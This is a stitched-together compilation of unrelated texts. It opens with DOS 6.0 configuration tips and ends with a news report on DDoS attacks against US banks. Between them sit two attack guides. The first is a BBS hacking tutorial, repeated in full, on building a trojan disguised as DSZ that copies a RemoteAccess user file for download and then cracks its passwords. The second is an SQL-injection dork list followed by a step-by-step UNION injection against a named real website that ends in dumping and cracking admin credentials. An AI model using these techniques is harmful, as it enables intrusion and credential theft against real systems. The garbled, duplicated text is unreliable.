DOS?=HIGH in CONFIG.SYS with DOS 6.0 will prompt you whether to load the DOS kernel high (into the HMA) or not.
===========================================================================
INSTALLHIGH
-----------
In DOS 6.0, there is an undocumented CONFIG.SYS command called INSTALLHIGH= which works just like INSTALL= but loads the TSR high (into upper memory).
The only drawback to this is that MemMaker will not touch INSTALLHIGH lines during the optimizing process. It just takes it as it is currently. But then again, INSTALL= is ignored too. All in all, INSTALL and INSTALLHIGH really are commands to set up manually by the user, and are not really recommended for normal use. Load TSRs at the beginning of AUTOEXEC.BAT (and using LOADHIGH if desired).
Example:
DOS=HIGH,UMB
DEVICE=C:\DOS\HIMEM.SYS
DEVICE=C:\DOS\EMM386.EXE NOEMS
INSTALLHIGH=C:\DOS\SHARE.EXE
===========================================================================
Using : for batch file comments
-------------------------------
DOS uses a leading : to indicate a label in a batch file. If the next character following the : is a space or other non-alphanumeric character, then DOS will decide it's an invalid label and skip to the next line, performing no further action. Faster batch file processing is achieved using this method for comments instead of REM commands.
===========================================================================
REM in lines with pipes or redirection
--------------------------------------
For example: REM echo y | del *.*
Problems are encountered when trying to REM out an "echo y | del *.*" line in a batch file. The problem appears to only occur if there is a pipe or redirection in the REMed out line, which shows that DOS first reads the entire line and processes pipes and redirections first, and then goes back to find out what to do with them in the line. It's actually doing what it thinks you've told it: Piping the output of REM to DEL. Since REM has no output, DEL hangs, waiting for the answer to its question.
===========================================================================
Delimiter character
-------------------
Prior to DOS 5.0, there was an undocumented DOS function that would allow you to set the DOS option delimiter character to something else, like a dash (-). Once you did this, you could use either \ or / in PATH specifications.
DOS 5.0 removed the function to set the option delimiter, but retained the function to query what it currently is.
(Unfortunately, no further details were provided in this file, so not sure if the delimiter character can still be changed somehow.)
(The REAL way to hack RemoteAccess)
Well dewdz, ya seen the file text about hacking RemoteAccess and you wanna
crack that H/P or warez RA board for mega ratios? Get Real!
RA *CAN* be hacked but only in the same way as any other BBS sox... no
sysop reading that file was shat themselves .. here's why not:
Basically the technique outlined involved you writing a trojan and
disguising it as some program the sysop is really gagging for in the hope
is he'll run it on his system. Wot it'll really do is copy his USER.BBS
onto the filebase so you can call back later and d/l it... neat idea, and
one that in *theory* will work with most BBS sox (most are EVEN easier coz
they don't encrypt the users file like RA) but their execution of it sucks!
Firstly, their compiled batch file relied on the sysop running RA off their
C: drive from the directory \RA... Yeah, maybe some lame PD board they
hang out on is like that but most sysops I know run multiple drives and
many have more complex directory structures... Lame Hacker 0 - Sysop 1
Okay... letz assume they got on some lame fucking board and the users file
*is* C:\RA\USERS.BBS - next step is to copy the file into the filebase and
make it d/lable. How do they do that? (patronising Dez Lymon voice) <g>.
Their idea was to copy the file into D:\FILES\UPLOAD .. Yeah sure guyz...
EVERY board uses the D: drive for the filebase and happen to have a file
area in \FILES\UPLOAD - NOT!!!!!! Lame Hacker 0 - Sysop 2
Right, so they got better odds than winning the national fucking lottery and
all the above worked (yeah man, we're dreamin' but let's give 'em a chance).
What next? The file has to be d/lable... you found a sysop that makes
UNCHECKED & UNSCANNED files available for download? Fuck off! Get a life!
Lame Hacker 0 - Sysop 3
So... okay.... we got a sysop that's so fucking lame he doesn't deserve
to to breath the same air as the rest of the human race and uses all the
above paths and makes unchecked uploads d/lable. RA by default won't allow
files to be d/led UNLESS they're in the file database. Unless the USERS.BBS
destination ALREADY EXISTED in that area and was previously in the area
database there's NO WAY you can d/l it.
The way they "solved" this was to add an entry to FILES.BBS in the file
directory. Nice one... EXCEPT RA DOESN'T USE FILES.BBS AS IT'S FILE
DATABASE. Unless you happen to be lucky enough that the sysop does an
import from FILES.BBS to the REAL file database before checking out your
planted file (most RA sysops only import from FILES.BBS when adding CDROMs)
the addition of this entry will do FUCK ALL! Lame Hacker 0 - Sysop 4
To quote from the author "This is a generic program and you will have to
tailor it so it will meet your needs." - yeah man, fucking rethink, redesign
and rewrite it more like!
Oh yeah... EVEN IF YOU DO get a copy of the USER.BBS file downloaded THE
PASSWORDS ARE ENCRYPTED!!! Lame Hacker :( - Sysop:-)
So how can U hack RA? Well, the idea was okay but, like hacking any system,
you gotta KNOW the system ya gonna hack b4 U stand a chance.
Most sysops will use the DOS environment variable RA set to the RA system
directory so that external doors can find the system files... that's very
helpful of the sysop, to show us where we can find his config files. <g>
In the RA system directory should be the file CONFIG.RA. You might want to
include a check for this file within your program and possibly do a disk
and directory scan for the file if RA isn't defined or is set incorrectly.
I'm not *entirely* sure about other versions of RA, but in the current
release (2.02) the CONFIG.RA offset &h3E4 is where the name of the mail
directory starts. This is the path where USERS.BBS will be found.
Next you need to know for SURE the name of a directory which stores the
files for a filearea from which you are able to download.
I suggest you do this in one of three ways:
1) Interogate the file FILES.RA in the RA system directory which contains
the filebase area configs. You *could* just search the directory for a
valid path but you'd wouldn't know if you had d/l access to the area.
2) If you want to be a bit more clever you could interpret the file and
find out the minimum security level required to d/l from each area and
dump your copy of USERS.BBS in the area with the lowest access level,
pretty much guaranteeing that you'll be able to get to the file. This
doesn't take security flags into account so there's still a SLIM
possiblity you won't be able to d/l the file unless you also write flag
testing into your program.
3) My favourite technique is to have the program read a small config file
which is uploaded with your archive. This file just contains the name
of a file you KNOW you have d/l access from. You can then either do a
global search for that filename or, preferably (coz it's faster) read
FILES.RA for the paths used by the filebase and search those.
So now you have the location of the USERS.BBS and the destination directory
you simply need to copy the file. However, even though the file is sitting
in a filebase directory it STILL isn't available for d/l... why? Because
it's not in the filearea database.
You could get clever and find amend filearea database files directly if you
get the fileareas path from CONFIG.RA (offset &hC12) and write to the files
HDR\FBD#####.HDR (header) IDX\FDB#####.IDX (index) and, if you want to add
a description, TXT\FBD#####.TXT, where ##### is the RA file area number.
There *is* an easier way. Shell out to DOS and execute the RAFILE utility
from the RA program path, passing the arguments "ADOPT filename #####".
E.g. the BASIC command would be:
SHELL "RAFILE ADOPT "+filename$+STR$(areanum)
Where filename$ contains the name of your USERS.BBS copy and areanum is the
RA filearea number. If your filename was USERTEST.ZIP and you'd copied it
to the directory used for RA file area 10 you'd be executing:
RAFILE ADOPT USERTEST.ZIP 10
This will "adopt" the file, adding it to the RA file database, making it
available for d/l (assuming you have the appropriate rights to the area).
All you need to do now is to package this trojan file to entice the sysop
into running it... In the LAME method for hacking RA the author used DSZ
as an example. That was about the most realistic part of the file and the
only bit worth leaching! <g>
Your archive:
DSZ.EXE (your program)
DSZ.DAT (the *real* DSZ.EXE)
DSZ.CFG (small file containing the name of a *known*
d/lable file - preferabbly encrypted)
+ any other files that normally come with DSZ
Flow diagram for DSZ.EXE trojan:
_______
/ \
| Start |
\_______/
|
|
+--------+--------+
| Read enviroment |
| variable RA |
+--------+--------+
|
|
/ \
/ \
/CONFIG.RA\ +---------------------+
/ exist in \___>____| Scan drives & paths |
\ that path / No | search for the file |
\ ? / +----------+----------+
\ / |
\ / |
Yes | |
+------------<-------------+
|
+--------+--------+
| Read CONFIG.RA |
| to get location |
| of USERS.BBS |
+--------+--------+
|
|
+--------+--------+
| Read DSZ.CFG to |
| get a filename |
+--------+--------+
|_____________<____________
| |
+--------+--------+ |
| Read FILES.RA to| |
| get name of the | |
| next filearea | |
+--------+--------+ |
| |
| |
/ \ |
/ \ |
/does area\ |
/ contain the \________>__________|
\ file / No
\ ? /
\ /
\ /
Yes |
|
+--------+--------+
| Copy USERS.BBS |
| to the filearea |
| directory |
+--------+--------+
|
|
+--------+--------+
| Run RAFILE with |
| ADOPT to update |
| RA database |
+--------+--------+
|
|
+--------+--------+
| Delete DSZ.EXE |
| and DSZ.CFG |
+--------+--------+
|
|
+--------+--------+
| Rename DSZ.DAT |
| to DSZ.EXE |
+--------+--------+
|
___|___
/ \
| Stop! |
\_______/
Once you've uploaded the file, preferably using a pseudonym, post the sysop
a message telling him how c00l your upload is. Wait a day or so and dial
back. Do a filename search using the name you decided to use for your copy
of USERS.BBS and d/l it.
The next step, now you have the USERS.BBS file is to crack the passwords.
I only know of ONE crack program out there which has the RA password
encryption algorythm, a program based on the popular Unix CRACKERJACK
program called RA-CRACK. This simply takes a given word, encrypts it, and
compares it to the USERS.BBS file to find a user with a matching password.
RA-CRACK takes it's source words from a text file so it would be possible
to either:
a) Use a TXT dictionary file as the source. All passwords that are
normal words will be found. This method will usually find about 90%
of the user passwords.
b) Write a "brute force" cracker using a small routine that "counts"
through valid ASCII character combinations from "!" (ASCII 33) upto
a string containing 25 (max length of a RA password) null characters
(ASCII 255), passing these via a text file to RA-CRACK. This SHOULD
be _100%_ successful, but SLOW!
crack that H/P or warez RA board for mega ratios? Get Real!
RA *CAN* be hacked but only in the same way as any other BBS sox... no
sysop reading that file was shat themselves .. here's why not:
Basically the technique outlined involved you writing a trojan and
disguising it as some program the sysop is really gagging for in the hope
is he'll run it on his system. Wot it'll really do is copy his USER.BBS
onto the filebase so you can call back later and d/l it... neat idea, and
one that in *theory* will work with most BBS sox (most are EVEN easier coz
they don't encrypt the users file like RA) but their execution of it sucks!
Firstly, their compiled batch file relied on the sysop running RA off their
C: drive from the directory \RA... Yeah, maybe some lame PD board they
hang out on is like that but most sysops I know run multiple drives and
many have more complex directory structures... Lame Hacker 0 - Sysop 1
Okay... letz assume they got on some lame fucking board and the users file
*is* C:\RA\USERS.BBS - next step is to copy the file into the filebase and
make it d/lable. How do they do that? (patronising Dez Lymon voice) <g>.
Their idea was to copy the file into D:\FILES\UPLOAD .. Yeah sure guyz...
EVERY board uses the D: drive for the filebase and happen to have a file
area in \FILES\UPLOAD - NOT!!!!!! Lame Hacker 0 - Sysop 2
Right, so they got better odds than winning the national fucking lottery and
all the above worked (yeah man, we're dreamin' but let's give 'em a chance).
What next? The file has to be d/lable... you found a sysop that makes
UNCHECKED & UNSCANNED files available for download? Fuck off! Get a life!
Lame Hacker 0 - Sysop 3
So... okay.... we got a sysop that's so fucking lame he doesn't deserve
to to breath the same air as the rest of the human race and uses all the
above paths and makes unchecked uploads d/lable. RA by default won't allow
files to be d/led UNLESS they're in the file database. Unless the USERS.BBS
destination ALREADY EXISTED in that area and was previously in the area
database there's NO WAY you can d/l it.
The way they "solved" this was to add an entry to FILES.BBS in the file
directory. Nice one... EXCEPT RA DOESN'T USE FILES.BBS AS IT'S FILE
DATABASE. Unless you happen to be lucky enough that the sysop does an
import from FILES.BBS to the REAL file database before checking out your
planted file (most RA sysops only import from FILES.BBS when adding CDROMs)
the addition of this entry will do FUCK ALL! Lame Hacker 0 - Sysop 4
To quote from the author "This is a generic program and you will have to
tailor it so it will meet your needs." - yeah man, fucking rethink, redesign
and rewrite it more like!
Oh yeah... EVEN IF YOU DO get a copy of the USER.BBS file downloaded THE
PASSWORDS ARE ENCRYPTED!!! Lame Hacker :( - Sysop:-)
So how can U hack RA? Well, the idea was okay but, like hacking any system,
you gotta KNOW the system ya gonna hack b4 U stand a chance.
Most sysops will use the DOS environment variable RA set to the RA system
directory so that external doors can find the system files... that's very
helpful of the sysop, to show us where we can find his config files. <g>
In the RA system directory should be the file CONFIG.RA. You might want to
include a check for this file within your program and possibly do a disk
and directory scan for the file if RA isn't defined or is set incorrectly.
I'm not *entirely* sure about other versions of RA, but in the current
release (2.02) the CONFIG.RA offset &h3E4 is where the name of the mail
directory starts. This is the path where USERS.BBS will be found.
Next you need to know for SURE the name of a directory which stores the
files for a filearea from which you are able to download.
I suggest you do this in one of three ways:
1) Interogate the file FILES.RA in the RA system directory which contains
the filebase area configs. You *could* just search the directory for a
valid path but you'd wouldn't know if you had d/l access to the area.
2) If you want to be a bit more clever you could interpret the file and
find out the minimum security level required to d/l from each area and
dump your copy of USERS.BBS in the area with the lowest access level,
pretty much guaranteeing that you'll be able to get to the file. This
doesn't take security flags into account so there's still a SLIM
possiblity you won't be able to d/l the file unless you also write flag
testing into your program.
3) My favourite technique is to have the program read a small config file
which is uploaded with your archive. This file just contains the name
of a file you KNOW you have d/l access from. You can then either do a
global search for that filename or, preferably (coz it's faster) read
FILES.RA for the paths used by the filebase and search those.
So now you have the location of the USERS.BBS and the destination directory
you simply need to copy the file. However, even though the file is sitting
in a filebase directory it STILL isn't available for d/l... why? Because
it's not in the filearea database.
You could get clever and find amend filearea database files directly if you
get the fileareas path from CONFIG.RA (offset &hC12) and write to the files
HDR\FBD#####.HDR (header) IDX\FDB#####.IDX (index) and, if you want to add
a description, TXT\FBD#####.TXT, where ##### is the RA file area number.
There *is* an easier way. Shell out to DOS and execute the RAFILE utility
from the RA program path, passing the arguments "ADOPT filename #####".
E.g. the BASIC command would be:
SHELL "RAFILE ADOPT "+filename$+STR$(areanum)
Where filename$ contains the name of your USERS.BBS copy and areanum is the
RA filearea number. If your filename was USERTEST.ZIP and you'd copied it
to the directory used for RA file area 10 you'd be executing:
RAFILE ADOPT USERTEST.ZIP 10
This will "adopt" the file, adding it to the RA file database, making it
available for d/l (assuming you have the appropriate rights to the area).
All you need to do now is to package this trojan file to entice the sysop
into running it... In the LAME method for hacking RA the author used DSZ
as an example. That was about the most realistic part of the file and the
only bit worth leaching! <g>
Your archive:
DSZ.EXE (your program)
DSZ.DAT (the *real* DSZ.EXE)
DSZ.CFG (small file containing the name of a *known*
d/lable file - preferabbly encrypted)
+ any other files that normally come with DSZ
Flow diagram for DSZ.EXE trojan:
_______
/ \
| Start |
\_______/
|
|
+--------+--------+
| Read enviroment |
| variable RA |
+--------+--------+
|
|
/ \
/ \
/CONFIG.RA\ +---------------------+
/ exist in \___>____| Scan drives & paths |
\ that path / No | search for the file |
\ ? / +----------+----------+
\ / |
\ / |
Yes | |
+------------<-------------+
|
+--------+--------+
| Read CONFIG.RA |
| to get location |
| of USERS.BBS |
+--------+--------+
|
|
+--------+--------+
| Read DSZ.CFG to |
| get a filename |
+--------+--------+
|_____________<____________
| |
+--------+--------+ |
| Read FILES.RA to| |
| get name of the | |
| next filearea | |
+--------+--------+ |
| |
| |
/ \ |
/ \ |
/does area\ |
/ contain the \________>__________|
\ file / No
\ ? /
\ /
\ /
Yes |
|
+--------+--------+
| Copy USERS.BBS |
| to the filearea |
| directory |
+--------+--------+
|
|
+--------+--------+
| Run RAFILE with |
| ADOPT to update |
| RA database |
+--------+--------+
|
|
+--------+--------+
| Delete DSZ.EXE |
| and DSZ.CFG |
+--------+--------+
|
|
+--------+--------+
| Rename DSZ.DAT |
| to DSZ.EXE |
+--------+--------+
|
___|___
/ \
| Stop! |
\_______/
Once you've uploaded the file, preferably using a pseudonym, post the sysop
a message telling him how c00l your upload is. Wait a day or so and dial
back. Do a filename search using the name you decided to use for your copy
of USERS.BBS and d/l it.
The next step, now you have the USERS.BBS file is to crack the passwords.
I only know of ONE crack program out there which has the RA password
encryption algorythm, a program based on the popular Unix CRACKERJACK
program called RA-CRACK. This simply takes a given word, encrypts it, and
compares it to the USERS.BBS file to find a user with a matching password.
RA-CRACK takes it's source words from a text file so it would be possible
to either:
a) Use a TXT dictionary file as the source. All passwords that are
normal words will be found. This method will usually find about 90%
of the user passwords.
b) Write a "brute force" cracker using a small routine that "counts"
through valid ASCII character combinations from "!" (ASCII 33) upto
a string containing 25 (max length of a RA password) null characters
(ASCII 255), passing these via a text file to RA-CRACK. This SHOULD
be _100%_ successful, but SLOW!
Tuesday, 2 October 2012
SQL INJECTION DORK LIST AND HOW TO
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: filesize()
"id=" & intext:"Warning: require()Now to check manually a site if it is vulnerable, just add ' at the end of the url:
For example, we have our target,
Code:
http://www.cocobod.gh/news_details.php?id=30Now, we want to check if this is SQLi vulnerable, so we add ' at the end:
Code:
http://www.cocobod.gh/news_details.php?id=30'If we got an error, that means that the site is vulnerable!
![[Image: 1301868109-1.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vZEm20M7LP88N7SQmF1LHoJxohSKtbow82UmW9QQg9shY29Lo9br6H9PgtZ_uEFcc906pRTblAYmk-ZIXXttgMyvaHtCqeEXYDEe03G1uponL2OQ=s0-d)
So, now we move on to the next step.
How To Find Columns Count:
After you have your vulnerable site, you need to know his columns count, to do this, just add "order by X--" at the end of the URL,
X is a number from 1 to unlimited.
For example, we have our target server and we try to count columns,
we add order by 1-- at the end , then order by 2--,ect. Always increase number until u got an error in your
So, in our target server, we have tried this:
Code:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown columnhttp://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
That means that the 8th column does not exist, that means that column count is 7!
How to Find The Accessible Columns:
Now, we now that column count which is 7, next step is to check for acsessable columns, to do that, we use this querie "UNION SELECT number,of,columns--" like this:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--You will get something like this:
![[Image: 1301868535-3.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t1RkPCCREO5B1QgLw1JjzmpzGl0BHrg1d1JOwO_vHhbLchQb-hCzrUBwZoBtAhc0HrzYR3aM5yXYwaLo_F25met3DE_D--CDchczVI-HTmOrJC1w=s0-d)
That means that we can get information from the site from the 6th, the 2nd and the 3rd column!
How To Get MySQL DB Version:
We need to know MySQL DB Version to know if we can exploit this site or not, cause every site that is using MySQL 4.x.x you wont be able to work on it, but every 5.x.x or above is exploitable.
So to know MySQL DB Vesrion, just replace the number of the used column with "@@version"
For example:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--![[Image: 1301869123-4.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uykYGqgdU1dUYwaulOqCnrlIPMuxiO_VSopiVmytBKi128mqNG8-_ZZuEKR6yrmldh-htqN6sWKoln0mmgg88OpPTM417k6OODyxBPwy9oMgvilvI=s0-d)
That means that we can continue working on this site.
How To Find Database Name:
Now , we are going to inject the site to find the DB Name,
to do this, replace the used column number with "group_concat(schema_name)", and add "from information_schema.schemata--" after the last column number, for example:
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(schema_name),7 from
information_schema.schemata--![[Image: 1301869671-5.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vSCyHsUjATsZOdMl2CxJeAv-nnD8-l3qF4lKFxA7cJh0SEursh9qExjez1siuzKGfmybhNoyrk-mDd3FiBJFTX4WAja2yx4I3Z2VjQJkuvsky4xpY=s0-d)
Now, to use the one the website uses, replace "group_concat(schema_name)" with "concat(database())" for example:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--![[Image: 1301869885-6.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u3MhittVnwDZZIMhL3uyzrVmK5POKcb8on-8GmJ55LAQuX06gWIMxKlp824TEnEVgWJkh5bLHTA6PXYmaYM9bDalIpKmyPZ0JwEnrFgbd4EyDavTY=s0-d)
Congrats, you got the used DB!
How to Get The Table Names:
Now we need to get table names, to do this, replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" at the end of columns number.
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(table_name),7 from
information_schema.tables where table_schema=database()--![[Image: 1301870439-7.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sqk_prVDN_PPD4aPvfo7kV1ke8k7tWk3FdY9dITCxXTtkjV_-HOmuOd71DWdg7WL0iHq--41YMlUxZReB8Wga2PZn4gUmsTTSUup_8mcg4V8YfyA=s0-d)
How To Get Column Names:
To get column names, we will use this querie:
group_concat(column_name)
from information_schema.columns where table_schema=database()--
Example:
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(column_name),7 from
information_schema.columns where table_schema=database()--![[Image: 1301870776-8.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sG75OOF-0L1PtFYLlY3r3PwlLf2_G7f6TLdhXFxvAtFmhkBMYcNbk3FhayOwB_jnoKgbZTB2cFEQ_q25OqYvcraC2DOmqgKa-uZLtuaD4XT0NqP44=s0-d)
How To Get Informations From Columns:
Now, we are in our final step, now we will get the admin info from column, how to do it?
Simple, follow this example:
Code:
http://www.site.com/news_details.php?id=30
union select
1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from
currentdb.tableused--So our exploit will be like this:
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from
cocobod_gh.coc_admin--![[Image: 1301871581-9.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s74LnO6UP9tD1yL5xRXuCwhMxMbb1SuoDA8aaq6SIz5l_NtTqOv_W-Nn4nBlYlzS9_fBfS0g2FECNLAtwwnZx-OAWZ_3js1oSvhkbycdViTOhQZcU=s0-d)
Now we need to decrypt the password that is crypted in md5,
go to http://www.md5decrypter.co.uk/ paste your hash, fill the captcha and click on decrypt, with a little luck, you will get the pass like here:
![[Image: 1301871757-10.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vcziqYavV0jluLaVR70SiGdEAKKXland_Od3FeW32oWKFhMuwIV8SpMiUl-fEKtgUuthwgIvR5OotWb9pAqZ8Big_KYkEUWO1XXib7qQdOH-63qj7P=s0-d)
We have succelfully injected a website, and got the admin info! Thank you for reading my TuT!
DDoS attacks hit Wells Fargo, PNC Bank, U.S. Bancorp
DDoS attacks against major U.S. banking websites are continuing this
week, with Wells Fargo, PNC Bank, U.S. Bankcorp all falling victim,
according to reports.
The source of the attacks, which are flooding the websites with so much traffic that they become unavailable, are still not known, though a hacktivist group calling itself the "Mrt. Izz ad-Din al-Qassam Cyber Fighters" reportedly took credit in a Pastebin post, which since has been removed. It said it launched the attacks out of protest to the anti-Muslim film "Innocence of Muslims," which has helped spark outrage in the Middle East against the United States.
That's the same collective that took responsibility for a string of DDoS attacks last week against Bank of America.
Mike Smith, security evangelist at web services provider Akamai, said DDoS attacks that knock out access to popular commercial websites are not uncommon.
"This kind of stuff happens all the time," he told SCMagazine.com on Thursday "Usually people don't talk about them. Over the past couple of years, people have talked about them because the attackers' intent is to get publicity. That's where hacktivists come along. For them, it's free public relations."
Smith said it's also possible the latest DDoS attacks are the work of an organized crime group, or are being launched merely as a distraction and a way to slow the bank's response to actual fraud taking place. But this doesn't appear to be the case.
Either way, according to those who have studied this latest round of attacks, they are powerful.
"From what I've been told (I'm not a network security specialist) the leading DDoS prevention software more or less stops working when the attacks get larger than 60-70 gigabytes and simply can't handle the bandwidth of these 100-plus gigabyte attacks," Avivah Litan, vice president and distinguished analyst of Gartner, wrote in a blog post on Thursday. "The major ISPs only have a few hundred gigabytes bandwidth for all their customers, and even if they added more on to that, the hacktivists could quickly and easily eat the additional bandwidth up.
As of this writing, one of the attacks appears to be ongoing: The website for PNC Bank is not reachable.
"Our systems are performing well today," Nicole Garrison-Sprenger, a U.S. Bancorp spokeswoman, told SCMagazine.com. "The attacks yesterday caused intermittent delays for some consumers visiting our website, but we can assure customers that their data and funds are secure. These issues are related to unusual and coordinated high traffic volume designed to slow down the system -- similar to what other banks have experienced in the past week.
